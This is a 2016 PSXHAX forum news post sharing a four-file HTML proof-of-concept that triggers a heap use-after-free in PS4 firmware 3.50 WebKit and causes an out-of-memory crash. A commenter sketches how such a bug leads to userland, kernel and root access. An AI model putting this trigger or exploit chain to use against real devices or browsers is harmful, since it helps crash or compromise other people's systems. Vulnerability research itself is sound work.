Category PS4 Jailbreaking       Thread starter PSXHAX       Start date May 21, 2016 at 3:38 PM       28,565       49            
Well that didn't take long since news of the PS4 Webkit Exploit for 3.50 broke, with PlayStation 4 developer Hunter128 stepping up to the plate with the heap use-after-free at WebCore 3.50 proof-of-concept! :)

Without further ado, here's what he had to say to quote: Hello. Appears this needs to be posted public.. Not sure who felt the need to want fame for this cough "Qwerty" but that's the last time i am sharing something special like this.

Anyone hoping for advancements for the PS Vita scene you can blame this guy on why because i am no longer sharing anything.

Anywho make an index.html
Code:
<html>
  <body onload='runTest()'>
    <script>
      function runTest(){
       document.writeln('<html></html>');
      }
    </script>
  <iframe src='1.html'></iframe>
  </body>
</html>
1.html
Code:
<html>
  <iframe src='2.html'></iframe>
  <iframe src='3.html'></iframe>
</html>
2.html
Code:
<html>
  <script>
      window.parent.stop();
  </script>
</html>
3.html
Code:
<html>
</html>
Should cause a out of memory error.

Shoutout to no one.. I have no friends :eek:

Greetz to @Plankton in the PSXHAX Shoutbox today for the news!
PS4 Heap Use-After-Free At WebCore 3.50 PoC.jpg

Comments

PSXHAX

Staff Member
Contributor
Verified
Thanks @proskopina :D

We couldn't do it without all those helping with news in the Shoutbox though... what I normally do is check the Shoutbox from my phone throughout the day, and if there is news then I hop on the PC to post it. :cool:

mcmrc1

Contributor
Verified
i think it is in this direction ->

Find a Vuin -> If found like the Memory error -> Check if the Vuln is exploitable -> If so its a good sign -> Next step use a exploit to the vuln for an entry point -> entry point ok -> exploit for userland is needed -> if found -> use exploit for userland to gain kernel access -> now we have Kernel access but another exploit is needed for gain root or run own code....

Just my thinking it can be wrong maybe a dev (Mr Toolchain and Mrs Kernel aka @Chaos Kid aka CFWProphet ^^) could explain if this is ok....^^

Recent Articles
Some of the PlayStation 4 E3 2019 PS4 Trailer Videos!
We've seen a Watch Dogs: Legion PS4, Marvel Avengers: A-Day PS4 and some Final Fantasy VIII Remastered & Final Fantasy VII Remake PS4 videos from E3 2019, and below are several more PlayStation 4...
Crash Team Racing: Nitro-Fueled Races to PS4 Next Week
CTR racers on your mark, get set, go... as Crash Team Racing: Nitro-Fueled speeds onto PlayStation 4 next week. šŸŽ šŸ Get ready to go fur-throttle in the fully-remastered and revved up to the max...
TurboGrafx-16 Mini, PC Engine Mini & PC Engine CoreGrafx Mini by Konami
A few months back we covered the Sega Genesis Mini reveal, and during E3 2019 Konami announced a TurboGrafx-16 Mini, PC Engine Mini and PC Engine CoreGrafx Mini on their official site for...
PS4 Firmware / System Software 6.80 Preview Program PUP and Features
As reported earlier this month, since their recent 6.71 PS4 OFW Update those enrolled in Sony's PlayStation Preview Program can now download and install the PS4 Firmware / System Software 6.80...